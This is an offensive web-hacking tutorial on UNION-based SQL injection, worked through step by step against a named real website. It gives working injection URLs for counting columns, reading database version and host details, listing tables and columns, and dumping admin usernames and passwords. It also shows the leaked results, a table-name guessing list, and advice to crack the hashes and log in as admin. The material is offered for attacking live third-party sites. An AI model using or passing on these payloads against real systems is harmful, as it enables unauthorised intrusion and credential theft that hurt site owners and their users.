Zer0Freak SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial:
Bypassing Login Pages with SQL injection (Basics and Intermediate)
- There are many types of SQL injection when it comes to web hacking
- What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
- However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
- Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page
Common Types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
What we are going to learn today is what we call
UNION Based SQL injection
Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
Lets just say that our website will look like this :
"
http://www.site.com/index.php?id=5"
Notice at the end of the URL, "
id=5"
This is what the query will look like
PHP Code:
SELECT * FROM index
WHERE id = 5
Alright, now you know a bit of how the website works, let's get hacking
Step1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like
http://www.site.com -.-
To hack a website, you need to scan it yourself by clicking links and find out if there's something like "
index.php?id=XXX" where "XXX" is a random
integer (number) or
string (word).
Alright now to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "
http://www.leadacidbatteryinfo.org" as an example.
Try browsing the website and see if you can find links like "
index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
Now to test for vulnerabilities is by
ADDING a
quote "
' " at the end of the url i.e after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This shows that the website is vulnerable to SQL injection.
How is this possible?
Look at the query when we added a quote "
' "
PHP Code:
SELECT * FROM article
WHERE id = 5 '
Notice that, their database never stored "id = 5 ' "
This is why they return an error result
Now that we know the website is vulnerable to SQL injection, let's advance to the next process
Step2: Finding the number of columns a website has
This is the part where most people had commonly misunderstood.
To get to the point, what we're about to do is find how many columns the website has using
NoError/Error statements.
Alright lets get started.
The query we'll be using is "
order by X--" where "
X" is a random integer (number)
Start by entering "
order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Error, there are no 25 columns, so it'll be less than 25
Now lets try "
order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
Still Error, so there are less than 20 columns
How about we go down a bit to "
order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
aha! No errors. So let's see if there are more than 5 columns
Now lets go up to "
order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
Hmm, no errors I see. So it's obvious that there could be more than 11 columns
See if we can increase to "
order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Error! So this means the last number that returned no error is 11
Therefore, the website has
11 columns
Tips:
An error while scanning for number of columns will look like this
While No errors will show the page as normal
Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
First off, we need to know what does "
UNION SELECT" means
Lets say we have 2 tables, "users" and "admin"
Basically,
UNION SELECT is a statement where all these information will be collected as one.
Look at this query
PHP Code:
SELECT * FROM users
UNION SELECT * FROM admin
If we perform the
UNION SELECT statement, we can get both users and admin information from their database
The point is that,
UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use
UNION SELECT
If you want to find version of database,
UNION SELECT
If you want admin information! use
UNION SELECT
Alright, now that we know something about the Union function, lets continue.
Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
This is what you would normally do if you use UNION function while SQL injecting a website
Focus on something like this, "
index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens "
-- " and another hyphen "
- " beside "X"
Step4: Random numbers appear on screen, the next step
Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "
vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
Here's how it'll look like:
You need to inject the number at the very top (always at the very top)
So, in this case we have number "8"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.
Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
Their functions
@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = Current hosting info
@@datadir = directory of the data of the website
To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Results:
So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll be knowing how to get the tables in the next step.
But for now, let's see what we can get with other statements
Lets try all statements at once shall we
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1 0,11--
Results:
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
We have almost every information we have about the website
Look close here, we used a command "
group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5
Step5:Getting the table names
What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first lets look up some functions we're gonna use to extract table names (
Important)
Code:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
In here, we replaced our vulnerable column with "
group_concat(table_name,0x0a)"
and then we added a
"
from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
Alright now that we've found the tables, what you're gonna have to do is
that, you have to find tables where user/admin information are stored
In this case, "
tbladmin" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "
group_concat(table_name,0x0a)"
After the last column = Add "
from information_schema.tables where table_schema=database()--"
Also,
don't forget about
UNION SELECT before the column numbers and the hyphen (
- ) before "X" at index.php?id=X where "X" is a random integer/string
Step6:Getting Columns from Tables
Alright obviously, our next task is to get the column names from a specific table which in our case was "
tbladmin'
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
Here's what we replaced:
table_name = replaced by "
column_name"
information_schema.tables = replaced by "
information_schema.columns"
table_schema = replaced by "
table_name"
database() = replaced by "
0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
First of all, these are known as Hex
To make a Hex readable, we put "
0x" at the beginning
I'll explain this briefly. So our table name was "
tbladmin"
To enter that table using the syntax above, we have to convert that table name to Hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the results will be "74626c61646d696e" (that's the hex)
Now to make it readable to the website, add "0x" at the beginning
So it will be:
Now you know how Hex works, lets look up some functions we replaced and know their uses (
Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex
Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom
Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "
username" and "
password"
Step7:Getting Data from Columns
Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Keep this formula-like syntax in your mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
Where "
X" is a random integer/string followed by a hyphen (
- ) while "
N" is the number/position of the column and "
columnName" is the column you want to extract data while "
tablename" is where you extract data from a specific table then two hyphens in the end (
-- )
CONTINUED BELOW
Once you execute that syntax, you get the username and password separated by a colon
In this case you'll need to crack them.
I'll make up a detailed tutorial on Hash cracking soon.
Alright after scanning the website for admin pages, you should see something like this:
Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser